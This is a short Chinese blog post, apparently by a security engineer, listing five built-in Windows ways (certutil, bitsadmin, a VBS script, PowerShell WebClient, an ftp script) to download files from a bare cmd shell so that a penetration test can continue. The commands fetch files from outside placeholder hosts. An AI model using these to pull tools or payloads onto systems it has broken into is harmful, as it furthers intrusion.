cmd 环境下载文件的几种方法 - 简书

0.182018.07.14 15:01:33 字数 161 阅读 20,970

在渗透中通常会遇到只有 cmd shell 的情况，在这种情况下，通常需要下载文件来进行后续渗透。这里记录了几种在 cmd 下不需要其他三方程序就可以直接下载文件的方法。

1.certutil
certutil -urlcache -split -f https://www.xxx.com/test.py
certutil -urlcache -split -f https://www.xxx.com/test.py ff.py #指定保存文件名

2.bitsadmin
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

3.vbs

#用echo写入
On Error Resume Next  
Dim iRemote,iLocal  
iLocal = LCase(WScript.Arguments(1))  
iRemote = LCase(WScript.Arguments(0))  
Set xPost = createObject("Microsoft.XMLHTTP") 
xPost.Open "GET",iRemote,0 
xPost.Send() 
Set sGet = createObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(xPost.responseBody) 
sGet.SaveToFile iLocal,2

cscript ff.vbs http://www.xxx.com/xx.jpg xx.jpg

4.powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/ff.jpg','c:\aaa.jpg')

5.ftp

echo open 8.8.8.8  >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt

更多精彩内容，就在简书 APP

“小礼物走一走，来简书关注我”

还没有人赞赏，支持一下

身自在某不知名网络安全工程师

总资产 26 共写了 1649 字获得 33 个赞共 37 个粉丝

被以下专题收入，发现更多相似内容

推荐阅读更多精彩内容

• 早上： 1、清洁为重点 早晨的肌肤经过一夜的修护，处于最佳的状态，所以不需要太多的护理，只需要清洁掉这一夜分泌…
• 避通辟，避谷，即自然辟谷，不吃五谷，方士道家当做修炼成仙的一种方法。 又称 “却谷 “、“断谷”、“绝谷”、“休粮”、…
  
  云散月明阅读 314 评论 0 赞 2
  https://www.jianshu.com/p/afb1e7b8acaf